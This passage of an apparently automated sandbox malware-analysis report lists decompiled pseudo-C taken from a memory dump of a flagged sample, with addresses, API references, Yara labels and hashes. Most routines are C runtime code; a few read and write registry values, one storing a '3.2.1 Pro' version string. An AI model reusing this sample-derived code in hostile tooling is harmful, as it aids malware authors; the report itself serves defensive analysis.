								_push(_t64);
								L23();
								_t71 = 0;
								E004401F5(0);
								goto L20;
							} else {
								_t31 = L004415D4(_t73, _v12, _t41);
								_t79 = _t79 + 0xc;
								if(_t31 != 0) {
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_t33 = L0043698A(0);
									asm("int3");
									_push(_t73);
									_t74 = _v40;
									if(_t74 != 0) {
										_t34 =  *_t74;
										_push(_t64);
										_t66 = _t74;
										while(_t34 != 0) {
											E004401F5(_t34);
											_t66 = _t66 + 4;
											_t34 =  *_t66;
										}
										_t33 = E004401F5(_t74);
									}
									return _t33;
								} else {
									_t36 = _v8;
									 *_t36 = _t73;
									_t71 = 0;
									_v8 = _t36 + 4;
									E004401F5(0);
									_t28 = _v12;
									goto L16;
								}
							}
						}
						goto L29;
					}
					L21:
					E004401F5(_t71);
					return _t64;
				}
				L29:
			}
































                                    0x0043d164
                                    0x0043d165
                                    0x0043d167
                                    0x0043d16c
                                    0x0043d16f
                                    0x0043d173
                                    0x0043d176
                                    0x0043d17b
                                    0x0043d17f
                                    0x0043d180
                                    0x0043d183
                                    0x0043d185
                                    0x0043d185
                                    0x0043d186
                                    0x0043d188
                                    0x0043d188
                                    0x0043d18b
                                    0x0043d18b
                                    0x0043d18e
                                    0x0043d191
                                    0x0043d199
                                    0x0043d19e
                                    0x0043d1a1
                                    0x0043d1a4
                                    0x0043d1a9
                                    0x0043d1a9
                                    0x0043d1ac
                                    0x0043d1b2
                                    0x0043d1b7
                                    0x0043d1b9
                                    0x0043d1bf
                                    0x0043d23a
                                    0x0043d23a
                                    0x00000000
                                    0x0043d1c1
                                    0x0043d1c1
                                    0x0043d223
                                    0x0043d1c6
                                    0x0043d1c8
                                    0x0043d1c8
                                    0x0043d1cb
                                    0x0043d1cb
                                    0x0043d1ce
                                    0x0043d1d1
                                    0x0043d1d8
                                    0x0043d1dc
                                    0x0043d1dc
                                    0x0043d1df
                                    0x0043d1e0
                                    0x0043d1e6
                                    0x0043d220
                                    0x0043d220
                                    0x00000000
                                    0x0043d1e8
                                    0x0043d1f0
                                    0x0043d1f6
                                    0x0043d22a
                                    0x0043d22b
                                    0x0043d230
                                    0x0043d233
                                    0x00000000
                                    0x0043d1f8
                                    0x0043d1fd
                                    0x0043d202
                                    0x0043d207
                                    0x0043d24e
                                    0x0043d24f
                                    0x0043d250
                                    0x0043d251
                                    0x0043d252
                                    0x0043d253
                                    0x0043d258
                                    0x0043d25e
                                    0x0043d25f
                                    0x0043d264
                                    0x0043d266
                                    0x0043d268
                                    0x0043d269
                                    0x0043d279
                                    0x0043d26e
                                    0x0043d273
                                    0x0043d276
                                    0x0043d278
                                    0x0043d27e
                                    0x0043d284
                                    0x0043d287
                                    0x0043d209
                                    0x0043d209
                                    0x0043d20c
                                    0x0043d20e
                                    0x0043d214
                                    0x0043d217
                                    0x0043d21c
                                    0x00000000
                                    0x0043d21f
                                    0x0043d207
                                    0x0043d1f6
                                    0x00000000
                                    0x0043d1e6
                                    0x0043d23c
                                    0x0043d23d
                                    0x0043d24b
                                    0x0043d24b
                                    0x00000000

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 8fd0c840282833bb3a8a99c20dbd839b9e3f6c12aa27e3cced7393c6cf30d85f
                                    • Instruction ID: f0011bd8ba433ad85047860dc40924a10541953e35d1305fdf776f14d2f3b5fd
                                    • Opcode Fuzzy Hash: 8fd0c840282833bb3a8a99c20dbd839b9e3f6c12aa27e3cced7393c6cf30d85f
                                    • Instruction Fuzzy Hash: AF315F36D00210A7CF25AF69E841ABF77B4EF4C764F25409FFD0597240EA399D428798
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00410AA7, Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 77%
                                    			E00410AA7(void* __ecx, char* __edx, char* _a4, char _a8, int _a32) {
				void* _v8;
				long _t12;
				int _t15;
				long _t17;
				signed int _t19;
				signed int _t20;

				_push(__ecx);
				_push(_t19);
				_t12 = RegCreateKeyA(0x80000001, __edx,  &_v8); // executed
				if(_t12 != 0) {
					_t20 = 0;
				} else {
					_t15 = E00402489();
					_t17 = RegSetValueExA(_v8, _a4, 0, _a32, L00401F95( &_a8), _t15); // executed
					RegCloseKey(_v8);
					_t20 = _t19 & 0xffffff00 | _t17 == 0x00000000;
				}
				L00401FC7();
				return _t20;
			}









                                    0x00410aaa
                                    0x00410aab
                                    0x00410ab6
                                    0x00410abe
                                    0x00410af7
                                    0x00410ac0
                                    0x00410ac4
                                    0x00410ade
                                    0x00410ae9
                                    0x00410af2
                                    0x00410af2
                                    0x00410afc
                                    0x00410b07

                                    APIs
                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00410AB6
                                    • RegSetValueExA.KERNELBASE(?,00460614,00000000,?,00000000,00000000,0046C518,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410ADE
                                    • RegCloseKey.ADVAPI32(?,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410AE9
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID:
                                    • API String ID: 1818849710-0
                                    • Opcode ID: 2edf4e72d7368318f1ab4fa0488b4ca7c051504535841057f64486ea7e563853
                                    • Instruction ID: e89491bdbf644e4e0ba0d344bde8c25a895909b1be654527de0f828c9f06b44b
                                    • Opcode Fuzzy Hash: 2edf4e72d7368318f1ab4fa0488b4ca7c051504535841057f64486ea7e563853
                                    • Instruction Fuzzy Hash: 7FF0C232040208BFCB00AFA0DC05DEE3B6CEF04B91F104226BD05A61A1EB759F10DA94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004108E2, Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 66%
                                    			E004108E2(void* __ecx, void* __edx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				char _v1036;
				long _t11;
				void* _t19;
				void* _t23;

				_v12 = 0x400;
				_t23 = __ecx;
				_t11 = RegOpenKeyExA(__edx, _a4, 0, 0x20019,  &_v8); // executed
				if(_t11 != 0) {
					_push(0x45f6bc);
				} else {
					RegQueryValueExA(_v8, _a8, 0, 0,  &_v1036,  &_v12); // executed
					RegCloseKey(_v8);
					_push( &_v1036);
				}
				E00402084(_t19, _t23);
				return _t23;
			}









                                    0x004108ef
                                    0x00410901
                                    0x00410904
                                    0x0041090c
                                    0x0041093b
                                    0x0041090e
                                    0x00410923
                                    0x0041092c
                                    0x00410938
                                    0x00410938
                                    0x00410942
                                    0x0041094d

                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00410904
                                    • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00410923
                                    • RegCloseKey.ADVAPI32(?), ref: 0041092C
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 3677997916-0
                                    • Opcode ID: 3efdacfa80388e9d7d057647b62979cc548e55fb5466ebc51e456bb7a03a6566
                                    • Instruction ID: 3e5bbf023fc67ff476987f8fad8e364188ed9517bf6302b110b94af4ea8623b3
                                    • Opcode Fuzzy Hash: 3efdacfa80388e9d7d057647b62979cc548e55fb5466ebc51e456bb7a03a6566
                                    • Instruction Fuzzy Hash: 66F0AFB5600308BBDB109F90DD05FED777C9B04B02F1000A6BB04B6191D6B4AB459BA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00410885, Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00410885(char* __edx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				int _t12;
				long _t14;
				long _t18;
				signed int _t19;

				_t12 = 4;
				_v12 = _t12;
				_v16 = _t12;
				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				}
				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12); // executed
				_t19 = RegCloseKey(_v8); // executed
				return _t19 & 0xffffff00 | _t18 == 0x00000000;
			}










                                    0x0041088d
                                    0x0041088e
                                    0x00410891
                                    0x004108a5
                                    0x004108ad
                                    0x00000000
                                    0x004108dc
                                    0x004108c3
                                    0x004108ce
                                    0x00000000

                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108A5
                                    • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046C518), ref: 004108C3
                                    • RegCloseKey.KERNELBASE(?), ref: 004108CE
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 3677997916-0
                                    • Opcode ID: 3e4358ca8370b7af3e6ef31cc7bcc25504ab58a31ab422cbec18238428394246
                                    • Instruction ID: 52561c361bf01b8e86e1a5ce9e630969f3828b93d2dbd7bb4aa450e57b23c49a
                                    • Opcode Fuzzy Hash: 3e4358ca8370b7af3e6ef31cc7bcc25504ab58a31ab422cbec18238428394246
                                    • Instruction Fuzzy Hash: A3F01D7690030CBFDF10AFA09C05FEEBBBCEB04B52F1041A5FA04E6195D2759B549B94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044765D, Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0044765D(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (L004475A3(_t19) - _t19 >> 1) + (L004475A3(_t19) - _t19 >> 1);
					_t6 = E0043F98C(_t14, (L004475A3(_t19) - _t19 >> 1) + (L004475A3(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E004324E0(_t18, _t19, _t12);
					}
					E004401F5(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







                                    0x0044765d
                                    0x00447667
                                    0x0044766b
                                    0x0044767c
                                    0x00447680
                                    0x00447685
                                    0x0044768b
                                    0x00447690
                                    0x00447695
                                    0x0044769a
                                    0x004476a1
                                    0x0044766d
                                    0x0044766d
                                    0x0044766d
                                    0x004476ac

                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 00447661
                                    • _free.LIBCMT ref: 0044769A
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004476A1
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: EnvironmentStrings$Free_free
                                    • String ID:
                                    • API String ID: 2716640707-0
                                    • Opcode ID: ca87d83b2957fa9352f777ae552d11f2944e91570d6f08a6d552ed0c63014bb8
                                    • Instruction ID: 4b3672921d85d94027c856c8d4557e31c130c3ea1869d6c91df0e3c849bae827
                                    • Opcode Fuzzy Hash: ca87d83b2957fa9352f777ae552d11f2944e91570d6f08a6d552ed0c63014bb8
                                    • Instruction Fuzzy Hash: 8AE0E537149A112AE222223A6C49E7B3619CFC67BA716002BF10886142DF288D0305AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0043F9DA, Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 96%
                                    			E0043F9DA(void* __ecx, void* _a4, long _a8) {
				void* __esi;
				void* _t4;
				long _t7;
				void* _t13;
				long _t15;

				_t10 = __ecx;
				_t13 = _a4;
				if(_t13 != 0) {
					_t15 = _a8;
					__eflags = _t15;
					if(_t15 != 0) {
						__eflags = _t15 - 0xffffffe0;
						if(_t15 <= 0xffffffe0) {
							while(1) {
								_t4 = RtlReAllocateHeap( *0x46ba48, 0, _t13, _t15); // executed
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = L0043ED9A();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = L0043C819(_t10, _t15, __eflags, _t15);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(L0043A504())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E004401F5(_t13);
					goto L6;
				}
				return E0043F98C(__ecx, _a8);
			}








                                    0x0043f9da
                                    0x0043f9e0
                                    0x0043f9e5
                                    0x0043f9f3
                                    0x0043f9f6
                                    0x0043f9f8
                                    0x0043fa03
                                    0x0043fa06
                                    0x0043fa2d
                                    0x0043fa37
                                    0x0043fa3d
                                    0x0043fa3f
                                    0x00000000
                                    0x00000000
                                    0x0043fa1e
                                    0x0043fa20
                                    0x00000000
                                    0x00000000
                                    0x0043fa23
                                    0x0043fa28
                                    0x0043fa29
                                    0x0043fa2b
                                    0x00000000
                                    0x00000000
                                    0x0043fa2b
                                    0x0043fa15
                                    0x00000000
                                    0x0043fa15
                                    0x0043fa08
                                    0x0043fa0d
                                    0x0043fa13
                                    0x0043fa13
                                    0x0043fa13
                                    0x00000000
                                    0x0043fa13
                                    0x0043f9fb
                                    0x00000000
                                    0x0043fa00
                                    0x00000000

                                    APIs
                                    • _free.LIBCMT ref: 0043F9FB
                                      • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                    • RtlReAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000001,?,0040F572,?,?,?,0040F89B), ref: 0043FA37
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap$_free
                                    • String ID:
                                    • API String ID: 1482568997-0
                                    • Opcode ID: 2da6057b54420b98b414b5f2f5752362a39b033e3997954cd58d08120b522eeb
                                    • Instruction ID: 409074293b3810aa7ddd1280863e7d0579cbe773a19cb3134e1aa8b6ea316b44
                                    • Opcode Fuzzy Hash: 2da6057b54420b98b414b5f2f5752362a39b033e3997954cd58d08120b522eeb
                                    • Instruction Fuzzy Hash: 08F0C832E0121275CB217A26BC00B5B27588FC9765F11613BF829A6291DE3CD80582AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401646, Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 80%
                                    			E00401646(signed int _a4, signed int _a8, char _a12) {
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* __esi;
				signed int _t59;
				signed int _t60;
				signed int _t62;
				signed int _t70;
				intOrPtr _t78;
				signed int _t80;
				signed int _t84;
				signed int _t85;
				intOrPtr _t86;
				signed int _t87;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr* _t99;
				signed int _t100;
				signed int _t101;
				signed int _t103;
				intOrPtr _t111;
				signed int _t119;
				intOrPtr* _t121;
				signed int _t122;
				signed int _t124;
				void* _t126;
				void* _t132;
				void* _t133;
				void* _t135;
				void* _t136;

				_t100 = _a4;
				if(_t100 != 0) {
					_t60 = _t59 | 0xffffffff;
					_t119 = _t60 % _a8;
					__eflags = _t60 / _a8 - _t100;
					if(_t60 / _a8 >= _t100) {
						_t101 = _t100 * _a8;
						__eflags = _a12;
						if(__eflags == 0) {
							L8:
							_t62 = E0042F218(_t119, _t126, __eflags, _t101); // executed
							_t103 = _t62;
							goto L9;
						} else {
							__eflags = _t101 - 0x1000;
							if(__eflags < 0) {
								goto L8;
							} else {
								_t64 = _t101 + 0x23;
								__eflags = _t101 + 0x23 - _t101;
								if(__eflags <= 0) {
									goto L3;
								} else {
									_t90 = E0042F218(_t119, _t126, __eflags, _t64);
									_t11 = _t90 + 0x23; // 0x23
									_t103 = _t11 & 0xffffffe0;
									 *((intOrPtr*)(_t103 - 4)) = _t90;
									L9:
									return _t103;
								}
							}
						}
					} else {
						L3:
						_t132 = _t135;
						_t136 = _t135 - 0xc;
						L0042F92F( &_v20);
						E0043205A( &_v20, 0x467c9c);
						asm("int3");
						_push(_t132);
						_t133 = _t136;
						L0042F962( &_v36);
						_t70 = E0043205A( &_v36, 0x467cd4);
						asm("int3");
						_push(_t133);
						 *0x46ad0c =  *0x46ad0c & 0x00000000;
						 *0x46a010 =  *0x46a010 | 1;
						_push(0xa);
						L0045077A();
						__eflags = _t70;
						if(_t70 != 0) {
							_v32 = _v32 & 0x00000000;
							 *0x46a010 =  *0x46a010 | 0x00000002;
							_push(_t126);
							 *0x46ad0c = 1;
							_t121 =  &_v56;
							_push(1);
							asm("cpuid");
							_pop(_t96);
							 *_t121 = 0;
							 *((intOrPtr*)(_t121 + 4)) = 1;
							 *((intOrPtr*)(_t121 + 8)) = 0;
							 *(_t121 + 0xc) = _t119;
							_v24 = _v56;
							__eflags = _v44 ^ 0x49656e69 | _v48 ^ 0x6c65746e | _v52 ^ 0x756e6547;
							_t78 = 1;
							_t111 = 0;
							_push(1);
							asm("cpuid");
							_pop(_t97);
							 *_t121 = _t78;
							 *((intOrPtr*)(_t121 + 4)) = _t96;
							 *((intOrPtr*)(_t121 + 8)) = _t111;
							 *(_t121 + 0xc) = _t119;
							if((_v44 ^ 0x49656e69 | _v48 ^ 0x6c65746e | _v52 ^ 0x756e6547) != 0) {
								L21:
								_t122 =  *0x46ad10;
							} else {
								_t89 = _v56 & 0x0fff3ff0;
								__eflags = _t89 - 0x106c0;
								if(_t89 == 0x106c0) {
									L20:
									_t122 =  *0x46ad10 | 0x00000001;
									 *0x46ad10 = _t122;
								} else {
									__eflags = _t89 - 0x20660;
									if(_t89 == 0x20660) {
										goto L20;
									} else {
										__eflags = _t89 - 0x20670;
										if(_t89 == 0x20670) {
											goto L20;
										} else {
											__eflags = _t89 - 0x30650;
											if(_t89 == 0x30650) {
												goto L20;
											} else {
												__eflags = _t89 - 0x30660;
												if(_t89 == 0x30660) {
													goto L20;
												} else {
													__eflags = _t89 - 0x30670;
													if(_t89 != 0x30670) {
														goto L21;
													} else {
														goto L20;
													}
												}
											}
										}
									}
								}
							}
							__eflags = _v24 - 7;
							_v40 = _v44;
							_t80 = _v48;
							_v20 = _t80;
							_v36 = _t80;
							if(_v24 >= 7) {
								_t86 = 7;
								_push(_t97);
								asm("cpuid");
								_t99 =  &_v56;
								 *_t99 = _t86;
								 *((intOrPtr*)(_t99 + 4)) = _t97;
								 *((intOrPtr*)(_t99 + 8)) = 0;
								 *(_t99 + 0xc) = _t119;
								_t87 = _v52;
								__eflags = _t87 & 0x00000200;
								_v32 = _t87;
								_t80 = _v20;
								if((_t87 & 0x00000200) != 0) {
									_t124 = _t122 | 0x00000002;
									__eflags = _t124;
									 *0x46ad10 = _t124;
								}
							}
							__eflags = _t80 & 0x00100000;
							if((_t80 & 0x00100000) != 0) {
								 *0x46a010 =  *0x46a010 | 0x00000004;
								 *0x46ad0c = 2;
								__eflags = _t80 & 0x08000000;
								if((_t80 & 0x08000000) != 0) {
									__eflags = _t80 & 0x10000000;
									if((_t80 & 0x10000000) != 0) {
										asm("xgetbv");
										_v28 = _t80;
										_v24 = _t119;
										__eflags = (_v28 & 0x00000006) - 6;
										if((_v28 & 0x00000006) == 6) {
											__eflags = 0;
											if(0 == 0) {
												_t84 =  *0x46a010 | 0x00000008;
												 *0x46ad0c = 3;
												__eflags = _v32 & 0x00000020;
												 *0x46a010 = _t84;
												if((_v32 & 0x00000020) != 0) {
													_t85 = _t84 | 0x00000020;
													__eflags = _t85;
													 *0x46ad0c = 5;
													 *0x46a010 = _t85;
												}
											}
										}
									}
								}
							}
						}
						__eflags = 0;
						return 0;
					}
				} else {
					return 0;
				}
			}










































                                    0x00401649
                                    0x0040164e
                                    0x00401654
                                    0x00401659
                                    0x0040165c
                                    0x0040165e
                                    0x00401665
                                    0x00401669
                                    0x0040166d
                                    0x00401690
                                    0x00401691
                                    0x00401697
                                    0x00000000
                                    0x0040166f
                                    0x0040166f
                                    0x00401675
                                    0x00000000
                                    0x00401677
                                    0x00401677
                                    0x0040167a
                                    0x0040167c
                                    0x00000000
                                    0x0040167e
                                    0x0040167f
                                    0x00401685
                                    0x00401688
                                    0x0040168b
                                    0x00401699
                                    0x0040169c
                                    0x0040169c
                                    0x0040167c
                                    0x00401675
                                    0x00401660
                                    0x00401660
                                    0x0042f97b
                                    0x0042f97d
                                    0x0042f983
                                    0x0042f991
                                    0x0042f996
                                    0x0042f997
                                    0x0042f998
                                    0x0042f9a0
                                    0x0042f9ae
                                    0x0042f9b3
                                    0x0042f9b4
                                    0x0042f9b7
                                    0x0042f9c5
                                    0x0042f9cb
                                    0x0042f9cd
                                    0x0042f9d2
                                    0x0042f9d4
                                    0x0042f9da
                                    0x0042f9e0
                                    0x0042f9e9
                                    0x0042f9eb
                                    0x0042f9f1
                                    0x0042f9f4
                                    0x0042f9f5
                                    0x0042f9f9
                                    0x0042f9fa
                                    0x0042f9fc
                                    0x0042f9ff
                                    0x0042fa02
                                    0x0042fa0b
                                    0x0042fa28
                                    0x0042fa2a
                                    0x0042fa2d
                                    0x0042fa2e
                                    0x0042fa2f
                                    0x0042fa33
                                    0x0042fa34
                                    0x0042fa36
                                    0x0042fa39
                                    0x0042fa3c
                                    0x0042fa3f
                                    0x0042fa84
                                    0x0042fa84
                                    0x0042fa41
                                    0x0042fa44
                                    0x0042fa49
                                    0x0042fa4e
                                    0x0042fa73
                                    0x0042fa79
                                    0x0042fa7c
                                    0x0042fa50
                                    0x0042fa50
                                    0x0042fa55
                                    0x00000000
                                    0x0042fa57
                                    0x0042fa57
                                    0x0042fa5c
                                    0x00000000
                                    0x0042fa5e
                                    0x0042fa5e
                                    0x0042fa63
                                    0x00000000
                                    0x0042fa65
                                    0x0042fa65
                                    0x0042fa6a
                                    0x00000000
                                    0x0042fa6c
                                    0x0042fa6c
                                    0x0042fa71
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0042fa71
                                    0x0042fa6a
                                    0x0042fa63
                                    0x0042fa5c
                                    0x0042fa55
                                    0x0042fa4e
                                    0x0042fa8a
                                    0x0042fa91
                                    0x0042fa94
                                    0x0042fa97
                                    0x0042fa9a
                                    0x0042fa9d
                                    0x0042faa1
                                    0x0042faa4
                                    0x0042faa5
                                    0x0042faaa
                                    0x0042faad
                                    0x0042faaf
                                    0x0042fab2
                                    0x0042fab5
                                    0x0042fab8
                                    0x0042fabb
                                    0x0042fac0
                                    0x0042fac3
                                    0x0042fac6
                                    0x0042fac8
                                    0x0042fac8
                                    0x0042facb
                                    0x0042facb
                                    0x0042fac6
                                    0x0042fad3
                                    0x0042fad8
                                    0x0042fada
                                    0x0042fae1
                                    0x0042faeb
                                    0x0042faf0
                                    0x0042faf2
                                    0x0042faf7
                                    0x0042fafb
                                    0x0042fafe
                                    0x0042fb01
                                    0x0042fb0f
                                    0x0042fb12
                                    0x0042fb14
                                    0x0042fb16
                                    0x0042fb1d
                                    0x0042fb20
                                    0x0042fb2a
                                    0x0042fb2e
                                    0x0042fb33
                                    0x0042fb35
                                    0x0042fb35
                                    0x0042fb38
                                    0x0042fb42
                                    0x0042fb42
                                    0x0042fb33
                                    0x0042fb16
                                    0x0042fb12
                                    0x0042faf7
                                    0x0042faf0
                                    0x0042fad8
                                    0x0042fb47
                                    0x0042fb4d
                                    0x0042fb4d
                                    0x00401650
                                    0x00401653
                                    0x00401653

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2c3a8728c390c113c6b132477eb103de07588fde746d332fb22f5e7a6bda1aeb
                                    • Instruction ID: 14bc11751579f6a418080d33961eb9a75802e287542bdf943e450bbe308a60cc
                                    • Opcode Fuzzy Hash: 2c3a8728c390c113c6b132477eb103de07588fde746d332fb22f5e7a6bda1aeb
                                    • Instruction Fuzzy Hash: BCF0B4712142085BCB0C9E34AC91BBA375D5B11368BA44B7FF02EDA1E1D73BD984824C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0043CFE1, Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 92%
                                    			E0043CFE1(void* __ebx, void* __ecx) {
				void* _t2;
				intOrPtr _t3;
				signed int _t15;
				signed int _t16;

				if( *0x46b4d0 == 0) {
					_push(_t15);
					E004472D9(__ecx); // executed
					_t2 = L004475DA(); // executed
					_t19 = _t2;
					if(_t2 != 0) {
						_t3 = E0043D08E(__ebx, _t19);
						if(_t3 != 0) {
							 *0x46b4dc = _t3;
							L00442853(0x46b4d0, _t3);
							_t16 = 0;
						} else {
							_t16 = _t15 | 0xffffffff;
						}
						E004401F5(0);
					} else {
						_t16 = _t15 | 0xffffffff;
					}
					E004401F5(_t19);
					return _t16;
				} else {
					return 0;
				}
			}







                                    0x0043cfe8
                                    0x0043cfee
                                    0x0043cfef
                                    0x0043cff4
                                    0x0043cff9
                                    0x0043cffd
                                    0x0043d005
                                    0x0043d00d
                                    0x0043d01a
                                    0x0043d01f
                                    0x0043d024
                                    0x0043d00f
                                    0x0043d00f
                                    0x0043d00f
                                    0x0043d028
                                    0x0043cfff
                                    0x0043cfff
                                    0x0043cfff
                                    0x0043d02f
                                    0x0043d039
                                    0x0043cfea
                                    0x0043cfec
                                    0x0043cfec

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 18f2041ca1429938108e02d2a53756847af81262eafccf0d74fd8bb75016ea07
                                    • Instruction ID: fba902ad4ccf31a8b90f9fdf44a17567959da2f799f45fbd848029ef9f978f3d
                                    • Opcode Fuzzy Hash: 18f2041ca1429938108e02d2a53756847af81262eafccf0d74fd8bb75016ea07
                                    • Instruction Fuzzy Hash: 56E0A02290541160E239363B7C0565B0265CBC973DF10432BF624C62C2EFAC884341AE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0043D03A, Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 91%
                                    			E0043D03A(void* __ebx, void* __ecx) {
				intOrPtr _t2;
				signed int _t14;
				signed int _t15;

				if( *0x46b4d4 == 0) {
					_push(_t14);
					_t18 = E0044765D(__ecx);
					if(_t1 != 0) {
						_t2 = E0043D15F(__ebx, _t18); // executed
						if(_t2 != 0) {
							 *0x46b4d8 = _t2;
							L00442853(0x46b4d4, _t2);
							_t15 = 0;
						} else {
							_t15 = _t14 | 0xffffffff;
						}
						E004401F5(0);
					} else {
						_t15 = _t14 | 0xffffffff;
					}
					E004401F5(_t18);
					return _t15;
				} else {
					return 0;
				}
			}






                                    0x0043d041
                                    0x0043d047
                                    0x0043d04d
                                    0x0043d051
                                    0x0043d059
                                    0x0043d061
                                    0x0043d06e
                                    0x0043d073
                                    0x0043d078
                                    0x0043d063
                                    0x0043d063
                                    0x0043d063
                                    0x0043d07c
                                    0x0043d053
                                    0x0043d053
                                    0x0043d053
                                    0x0043d083
                                    0x0043d08d
                                    0x0043d043
                                    0x0043d045
                                    0x0043d045

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 0ed99ebbe2187b1f32701bb3281fabb5ff88b2b1b91a9808e210955f1cab387e
                                    • Instruction ID: 74d36269402cbfa58112ba2610b1878482336c4429228e10655473553982713d
